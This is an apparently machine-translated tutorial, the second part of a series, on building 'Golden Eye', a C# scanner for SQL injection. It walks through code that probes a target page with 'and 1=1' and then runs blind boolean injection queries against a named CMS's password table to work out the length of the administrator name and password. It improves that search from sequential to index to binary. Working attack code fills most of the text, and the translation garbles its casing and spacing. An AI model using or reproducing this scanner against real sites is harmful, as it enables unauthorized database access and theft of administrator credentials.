Golden Eye-creation of SQL Injection scanner (2)

Golden Eye-creation of SQL Injection scanner (2)

(Author: mikespook | Release Date: | views: 51)

Keywords: Golden Eye, SQL injection, scanner, C #

Programming: Finally, I can start my favorite part (^ _*). First, let me explain how to select a programming tool. Many of my tools are written in C # Based on the DOTNET platform. I think this lightweight tool should be written in a fast and convenient way. Of course, C/C ++ or even assembly is used for writing. Your tool execution efficiency will be very high. But is it a waste of time? Here I want to talk about some additional things. A friend left a message on my website saying how to learn programming. In my opinion, language is just a carrier and an expression. I think everyone must have the following experience: when describing an event or an object. Sometimes it is more accurate and convenient to describe in words; sometimes it is better to describe in numbers. This is the truth. Programming, in fact, you can use any language. However, you should select the most convenient and fast one. I personally disagree, because the middleware languages such as C # and Java are excluded when I like assembly. C/C ++ is excluded if you like C # or Java. This is an extreme mistake !!! Okay, a lot of nonsense, and a lot of fraud. I just want everyone to understand, because today I want to use C # to work again. Hey hey ...... The old method is to give you a perceptual knowledge on the Interface first. Today we will design such a scanner (Figure 1 ): Put four text boxes on the Interface: txtpage, txtname, txtpass, and txtlog. Enter the target page, Administrator name, password, and log. Put two more buttons: btntest and btnok. As the test button and scan button. Then, add some labels for beautification and illustration. The interface is too simple. Now we can start encoding. To access our target page, submit carefully prepared SQL Injection code. We must access the network and use the HTTP protocol: connection, sending, receiving, and disconnection ...... So what we just mentioned is the process of using C/C ++. Yes, it doesn't have to be so troublesome in C. We have prepared a complete set of URL operation classes in the DOTNET class library. In the namespace system. net, there are two classes: httpwebrequest and httpwebresponse. Request and response respectively ). For more information, see the following code: Public bool getpage (string URL) { Try { // Value Temporary Variable R. Bool r = false; // Create an httpwebrequest object for the specified URL. Httpwebrequest myhttpwebrequest = (httpwebrequest) webrequest. Create (URL ); // Send httpwebrequest and wait for a response. Httpwebresponse myhttpwebresponse = (httpwebresponse) myhttpwebrequest. getresponse (); // Check if httpwebrequest is set to httpstatuscode. OK, set the temporary variable to true. If (myhttpwebresponse. statuscode = httpstatuscode. OK) R = true; // Release resources used by httpwebrequest. Myhttpwebresponse. Close (); // The function returns the Temporary Variable R. Return R; } Catch (webexception E) { // When a webexception is caught, the function returns false. Return false; } Catch (exception E) { // When an exception is caught, the function returns false. Return false; } } This function uses the parameter URL to input the address of the target page. "Httpwebrequest myhttpwebrequest = (httpwebrequest) webrequest. Create (URL);" is used to establish a connection between an httpwebrequest object and the target page. "Httpwebresponse myhttpwebresponse = (httpwebresponse) myhttpwebrequest. getresponse ();" will send a request and create an httpwebresponse object to receive the response. The response code is stored in "myhttpwebresponse. statuscode. The response code here is the code returned by the server. For example, 200 indicates successful access, 404 indicates that the page does not exist, and 500 indicates an internal server error (well, it seems that when the preceding SQL injection is successful, is Error 500 displayed. That's right. Check it out !)...... The enumerated value in httpstatuscode of the enumeration type is the server return code described above. For example, "httpstatuscode. OK" indicates the return code 200; "httpstatuscode. internalservererror" indicates the return code 500. Compare the response code "myhttpwebresponse. statuscode" with the enumerated value "httpstatuscode. OK. If they are equal, the page access is successful, and the function returns true. If not, the function returns false. In the middle, I also use try... Catch... Capture any possible errors. If any error occurs, false is returned. Add this function to the class of the main form, and remember to use the namespace system. net for the main form class. This completes the core part. Next let's take a look at how to use this function. Add the following code to the Click Event of the btntest button: Private void btntest_click (Object sender, system. eventargs E) { If (this. getpage (txtpage. Text + "% 20and % 201 = 1 ")) Txtlog. Text = "this page may have the SQL injection vulnerability. You can try to scan it! "; Else Txtlog. Text = "this page does not have the SQL injection vulnerability and cannot be scanned! "; } "Txtpage. Text +" % 20and % 201 = 1 "" is actually a synthesis of SQL Injection statements. Fill in the address of the target page in the txtpage text box. Do you still remember the "and 1 = 1" mentioned above? Here, only Unicode is used to encode spaces. Use the getpage () function to determine whether the page can be accessed. If true is returned, the page can be accessed. The injection test is successful. Otherwise, the test fails. The getpage () function we wrote will be used later. Let's take a look at how to implement scanning. This is the most difficult part. But the thinking process will be interesting. When talking about the SQL injection vulnerability, I can use "movie. asp? Id = 123 and 1 = (select ID from password where Len (name) = 10) "to determine whether the user name length is equal to 10. In the jinmei system, the maximum length of the Administrator name is 20. Then we can: "Movie. asp? Id = 123 and 1 = (select ID from password where Len (name) = 1 )" "Movie. asp? Id = 123 and 1 = (select ID from password where Len (name) = 2 )" "Movie. asp? Id = 123 and 1 = (select ID from password where Len (name) = 3 )" ...... Use this method to test the length of the Administrator name. Of course, you can use the same method to test the password length. However, the maximum password length of the "Jin Mei" system is 50. Compile the following functions: Private int getfieldlen (string table, string field, int L, int H) { For (INT I = L; I <= H; I ++) If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ") = "+ I. tostring () + ")")) Return I; Return 0; } This function is highly versatile. There are four parameters: table is the name of the table to be scanned, and the table password is used in the "Jin Mei" system. Field is the name of the field to be tested, for example, the name and PWD fields in the "Jin Mei" system. Parameters L and H represent the scan range. That is, the minimum length and maximum length of the test. We can use this function to scan the Administrator name, for example, getfieldlen ("password", "name", 1, 20 ). In this case, the function returns the length of the Administrator name. The length of the scanned password can be: getfieldlen ("Password", "PWD", 1, 50 ). We can see that this function is a function in "Golden Eye" 1.0, which can be said to be very slow. In order to compare the field values, we must compare them one by one. For example, in extreme cases, the other party sets a 20-bit long Administrator name and 50-bit long password. Then the number of comparisons is 20 and 50 to get the required length. This algorithm is called "sequential search ". The advantage of an algorithm is simplicity. We can see that a total of four lines of code are used, and we can complete the search. Unfortunately, although it is very simple to write, the execution efficiency is low! In "Golden Eye" 1.1, I used "index search" to Improve the efficiency: Private int getfieldlen (string table, string field, int L, int H) { Int index1 = (L + H)/3; Int index2 = (L + H) * 2/3; If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ") <"+ index1.tostring () + ")")) For (INT I = L; I <index1; I ++) If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ") = "+ I. tostring () + ")")) Return I; If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ") <"+ index2.tostring () + ")")) For (INT I = index1; I <index2; I ++) If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ") = "+ I. tostring () + ")")) Return I; For (INT I = index2; I <= H; I ++) If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ") = "+ I. tostring () + ")")) Return I; Return 0; } Is it a bit dizzy? The code for "index search" is much more complicated! In fact, the code above "index search" is very clear. Let's take a look at the following sequence: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 This is the sequence we are looking. The first and second sentences in this search process: "int index1 = (L + H)/3;", "int index2 = (L + H) * 2/3 ;", I actually created two indexes. For example, in the search of the 20 elements, the first index is 7, and the second index is 14. You should note that there is a condition statement before each sequential query statement. This condition statement is used to determine the index. The process is roughly as follows: Determine whether the field length is less than 7. If the value is less than 7, search for 1-6 in sequence. Otherwise Determine whether the field length is less than 14. If the value is less than 14, search for 7-13 in sequence. Otherwise Search for 14-20 in sequence. In this way, the range of sequential search is reduced by 2/3 using indexes. The search range is small and the number of comparisons is reduced. Of course, the speed has improved a lot. But is this the fastest way? Let's take a look at the following code: Private int getfieldlen (string table, string field, int L, int H) { Int nlen = 0; Int low = L; Int hig = h; Int mid; Int TMP = H-l; While (low <= HIG) & (TMP! = 0 )) { Mid = (low + HIG)/2; If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ") <"+ mid. tostring () + ")")) Hig = mid-1; Else If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ")> "+ mid. tostring () + ")")) Low = Mid + 1; Else If (this. getpage (strpage + "% 20and % 201 = (select % 20id % 20 from % 20" + Table + "% 20 where % 20len (" + field + ") = "+ mid. tostring () + ")")) { Nlen = mid; Break; } -- TMP; } Return nlen; } It is very complicated. Every cycle uses "mid = (low + HIG)/2;" to calculate the new value. This is "half-lookup ". I use natural language to describe the "half-lookup" method: Loop: When low Mid = (low + high)/2 // calculates the middle of low and high Determines whether the length of a field is smaller than the Intermediate Value mid. If it is smaller than, the value high = mid-1 Otherwise Determines whether the length of a field is greater than the mid value. If it is greater than, make low = Mid + 1 Otherwise Determines whether the length of a field is equal to the mid value. If it is equal to, the length of the returned field is returned. The loop ends; Is the algorithm hard to understand? In fact, you only need to set a group of ordered numbers. Then, select a random number and apply the above algorithm to search for it. You will understand it several times in one step. Step by step!